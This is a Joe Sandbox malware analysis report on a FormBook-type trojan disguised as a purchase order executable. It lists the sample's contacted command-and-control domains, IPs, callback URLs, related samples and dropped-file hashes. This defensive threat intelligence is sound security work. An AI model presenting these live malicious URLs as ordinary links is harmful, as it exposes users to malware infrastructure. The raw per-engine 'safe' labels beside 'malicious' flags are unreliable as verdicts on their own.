            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.d55dg.top/ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU=0%Avira URL Cloudsafe
            http://www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.healthsolutions.top/cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs=0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/gxi9/0%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/0%Avira URL Cloudsafe
            http://www.dfbio.net/yzen/0%Avira URL Cloudsafe
            http://www.healthsolutions.top/cent/0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www70.clientebradesco.online/0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.myim.cloud/12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.begumnasreenbano.com0%Avira URL Cloudsafe
            http://www70.clientebradesco.online/3%VirustotalBrowse
            http://www.begumnasreenbano.com/ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/1%VirustotalBrowse
            http://www.fineg.online/mkan/0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://www.myim.cloud/12ts/0%Avira URL Cloudsafe
            http://www.clientebradesco.online/xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg=0%Avira URL Cloudsafe
            http://www.begumnasreenbano.com0%VirustotalBrowse
            http://www.golbasi-nakliyat.xyz/gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.begumnasreenbano.com/ibl4/0%Avira URL Cloudsafe
            http://www.myim.cloud/12ts/1%VirustotalBrowse
            http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/0%Avira URL Cloudsafe
            http://www.omexai.info/45sz/0%Avira URL Cloudsafe
            http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH0%Avira URL Cloudsafe
            http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvu0%Avira URL Cloudsafe
            http://www.dfbio.net/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR80%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/p6o9/0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/1%VirustotalBrowse
            http://www.qiluqiyuan.buzz/p6o9/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.clientebradesco.online
            		198.58.118.167
            		truefalse
              		unknown
              aflaksokna.com
              		5.144.130.52
              		truetrueunknown
              d55dg.top
              		154.23.184.240
              		truetrueunknown
              www.healthsolutions.top
              		13.248.169.48
              		truetrueunknown
              www.asian-massage-us.xyz
              		199.59.243.226
              		truetrueunknown
              www.qiluqiyuan.buzz
              		161.97.168.245
              		truetrue
                		unknown
                www.dfbio.net
                		218.247.68.184
                		truetrue
                  		unknown
                  www.fineg.online
                  		162.0.239.141
                  		truetrue
                    		unknown
                    omexai.info
                    		3.33.130.190
                    		truetrueunknown
                    natroredirect.natrocdn.com
                    		85.159.66.93
                    		truetrueunknown
                    www.myim.cloud
                    		199.59.243.226
                    		truetrueunknown
                    www.begumnasreenbano.com
                    		188.114.97.3
                    		truetrueunknown
                    www.golbasi-nakliyat.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.omexai.info
                      		unknown
                      		unknowntrueunknown
                      www.esistiliya.online
                      		unknown
                      		unknowntrueunknown
                      www.d55dg.top
                      		unknown
                      		unknowntrueunknown
                      www.aflaksokna.com
                      		unknown
                      		unknowntrueunknown
                      www.950021.com
                      		unknown
                      		unknowntrueunknown
                      www.arlon-commerce.com
                      		unknown
                      		unknowntrueunknown
                      www.thriveline.online
                      		unknown
                      		unknowntrue
                        		unknown
                        206.23.85.13.in-addr.arpa
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.aflaksokna.com/ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.d55dg.top/ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU=true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.healthsolutions.top/cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs=true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.golbasi-nakliyat.xyz/gxi9/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.aflaksokna.com/ifo8/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dfbio.net/yzen/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.healthsolutions.top/cent/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.asian-massage-us.xyz/kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.asian-massage-us.xyz/kc69/true
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.myim.cloud/12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.begumnasreenbano.com/ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fineg.online/mkan/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.myim.cloud/12ts/true
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.clientebradesco.online/xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg=false
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.begumnasreenbano.com/ibl4/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.golbasi-nakliyat.xyz/gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.d55dg.top/ftud/true
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.omexai.info/45sz/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dfbio.net/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.qiluqiyuan.buzz/p6o9/true
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ecosia.org/newtab/chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www70.clientebradesco.online/firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmpfalse
                        • 3%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.comchkntfs.exe, 00000003.00000002.4119101815.0000000005D2E000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4119101815.00000000056E6000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4120867078.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003896000.00000004.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003EDE000.00000004.00000001.00040000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.begumnasreenbano.comftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiLchkntfs.exe, 00000003.00000002.4119101815.0000000005554000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAHchkntfs.exe, 00000003.00000002.4119101815.0000000006052000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000004202000.00000004.00000001.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuchkntfs.exe, 00000003.00000002.4119101815.000000000669A000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000484A000.00000004.00000001.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        5.144.130.52
                        		aflaksokna.comIran (ISLAMIC Republic Of)
                        		59441HOSTIRAN-NETWORKIRtrue
                        13.248.169.48
                        		www.healthsolutions.topUnited States
                        		16509AMAZON-02UStrue
                        188.114.97.3
                        		www.begumnasreenbano.comEuropean Union
                        		13335CLOUDFLARENETUStrue
                        162.0.239.141
                        		www.fineg.onlineCanada
                        		22612NAMECHEAP-NETUStrue
                        218.247.68.184
                        		www.dfbio.netChina
                        		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                        199.59.243.226
                        		www.asian-massage-us.xyzUnited States
                        		395082BODIS-NJUStrue
                        154.23.184.240
                        		d55dg.topUnited States
                        		174COGENT-174UStrue
                        3.33.130.190
                        		omexai.infoUnited States
                        		8987AMAZONEXPANSIONGBtrue
                        85.159.66.93
                        		natroredirect.natrocdn.comTurkey
                        		34619CIZGITRtrue
                        198.58.118.167
                        		www.clientebradesco.onlineUnited States
                        		63949LINODE-APLinodeLLCUSfalse
                        161.97.168.245
                        		www.qiluqiyuan.buzzUnited States
                        		51167CONTABODEtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1503298
                        Start date and time:2024-09-03 10:42:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PO_987654345678.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@7/5@17/11
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 90%
                        • Number of executed functions: 54
                        • Number of non-executed functions: 297
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 92.204.80.11
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:43:53API Interceptor11600811x Sleep call for process: chkntfs.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        5.144.130.52INV20240828.exeGet hashmaliciousFormBookBrowse
                        • www.aflaksokna.com/ifo8/
                        13.248.169.48COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                        • www.dyme.tech/h7lb/
                        play.exeGet hashmaliciousFormBookBrowse
                        • www.astrocloud.shop/7mxg/
                        INV20240828.exeGet hashmaliciousFormBookBrowse
                        • www.healthsolutions.top/cent/
                        COM404 PDF.exeGet hashmaliciousFormBookBrowse
                        • www.opentelemetry.shop/he2a/?9r9Hc=ivWl&NtxTwXO=KCPTlsMcF8eqeRPoupc8NSnF5ATV37tgrRW1pEzwOBbcxu+G1NpS7ZYtf9ZA4e+ZQi383eqNlg==
                        quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                        • www.somon.app/jys5/?pbM=rVxTT&lz=Gv2FWEuKupcxnbQ0F3wuClB9GaJm+HhnnRk0N+Y5EGHs9JmWyVRozS4hAZOY3TSoZ8xeM4DSbtugb4BFcxOd14Bplzi5QjmPlStqozPHXjG7lc9y/dalULA=
                        rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                        • www.study-in-nyc.online/elaa/
                        REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.dyme.tech/pjne/
                        COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                        • www.eworld.org/74ki/
                        Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                        • www.healthsolutions.top/p2w8/
                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                        • www.dyme.tech/bduc/
                        188.114.97.3LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
                        • www.zabbet911.bet/rn94/?Rfg=Yi0IRovNQwWOfnAHy08ht/gCTr40RJf7rc9gkmQ39zkhNPgtJcFQ44BySlkdb+pXqOs/&D8v=8pGtVJo0up
                        http://www.a-r-robot.com/Get hashmaliciousUnknownBrowse
                        • www.a-r-robot.com/pdw/favicon.ico
                        firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                        • 188.114.97.3/
                        firmware.i586.elfGet hashmaliciousUnknownBrowse
                        • 188.114.97.3/
                        play.exeGet hashmaliciousFormBookBrowse
                        • www.playdoge.buzz/dkjp/
                        SecuriteInfo.com.Trojan.DownLoader47.19820.5694.3811.exeGet hashmaliciousUnknownBrowse
                        • rustmacro.ru/autoupdate.exe
                        QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                        • filetransfer.io/data-package/DGApDW0P/download
                        QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                        • filetransfer.io/data-package/DGApDW0P/download
                        QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • filetransfer.io/data-package/8hthkO24/download
                        gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                        • joxi.net/4Ak49WQH0GE3Nr.mp3

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.qiluqiyuan.buzzINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 161.97.168.245
                        AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                        • 161.97.168.245
                        PO#4510065525.exeGet hashmaliciousFormBookBrowse
                        • 161.97.168.245
                        www.healthsolutions.topINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        www.dfbio.netINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 218.247.68.184
                        rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                        • 218.247.68.184
                        natroredirect.natrocdn.com1ow4Qkxfz5.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                        • 85.159.66.93
                        play.exeGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        8htbxM8GPX.exeGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        INV20240828.exeGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 85.159.66.93
                        IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 85.159.66.93
                        New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        350.xlsGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                        • 85.159.66.93
                        www.asian-massage-us.xyzINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 199.59.243.226
                        www.fineg.onlineINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 162.0.239.141
                        www.clientebradesco.onlineINV20240828.exeGet hashmaliciousFormBookBrowse
                        • 45.33.23.183

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        HOSTIRAN-NETWORKIRDOCUMENTS.vbsGet hashmaliciousAgentTeslaBrowse
                        • 5.144.130.41
                        INV20240828.exeGet hashmaliciousFormBookBrowse
                        • 5.144.130.52
                        Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 5.144.130.41
                        rDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
                        • 185.83.114.124
                        rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                        • 185.83.114.124
                        Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 5.144.130.49
                        PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 5.144.130.49
                        PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 5.144.130.49
                        PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 5.144.130.35
                        Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 5.144.130.35
                        CLOUDFLARENETUShttps://admsdworft.top/eky/index.html#crfa_norte_rec@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                        • 188.114.96.3
                        https://travefy.com/f/6ws9rqrq4lmqra2uwxzy6aezsp4xkxar2apshpykuftzrrwdwjsujpvewgjnqxkagajsxvdptxmqhrazxxjrapumsdyzhnespwtsgsvcsqaqkdqqGet hashmaliciousUnknownBrowse
                        • 1.1.1.1
                        NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                        • 188.114.96.3
                        Xerox Scan_08312024151015.pdfGet hashmaliciousUnknownBrowse
                        • 172.67.140.30
                        Xerox Scan_08312024151015.pdfGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        http://www.pro-pharma.co.ukGet hashmaliciousUnknownBrowse
                        • 104.17.25.14
                        SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exeGet hashmaliciousUnknownBrowse
                        • 104.18.17.253
                        https://www.therecoveryvillage.com/drug-addiction/signs-drug-addiction/Get hashmaliciousUnknownBrowse
                        • 104.22.54.104
                        SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exeGet hashmaliciousUnknownBrowse
                        • 104.21.90.238
                        SOCRETAS GRAECIA VSL's PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        AMAZON-02UShttps://travefy.com/f/6ws9rqrq4lmqra2uwxzy6aezsp4xkxar2apshpykuftzrrwdwjsujpvewgjnqxkagajsxvdptxmqhrazxxjrapumsdyzhnespwtsgsvcsqaqkdqqGet hashmaliciousUnknownBrowse
                        • 34.250.67.152
                        http://www.porschecentreglasgow.co.ukGet hashmaliciousUnknownBrowse
                        • 52.222.249.7
                        https://www.therecoveryvillage.com/drug-addiction/signs-drug-addiction/Get hashmaliciousUnknownBrowse
                        • 108.138.26.11
                        TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                        • 18.141.10.107
                        djvu452.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        https://altanks.com.au/Get hashmaliciousUnknownBrowse
                        • 216.137.45.10
                        https://altanks.com.au/Get hashmaliciousUnknownBrowse
                        • 13.33.187.70
                        https://altanks.com.au/Get hashmaliciousUnknownBrowse
                        • 13.33.187.103
                        Invoice INV_1266.pdfGet hashmaliciousUnknownBrowse
                        • 52.85.49.77
                        https://xz0816.cn/Get hashmaliciousUnknownBrowse
                        • 3.255.41.64

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\Maianthemum

                        Download File
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289280
                        Entropy (8bit):7.994772609984253
                        Encrypted:true
                        SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                        MD5:9E727CACC162F14482B7C2077F0D7109
                        SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                        SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                        SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                        Malicious:false
                        Reputation:low
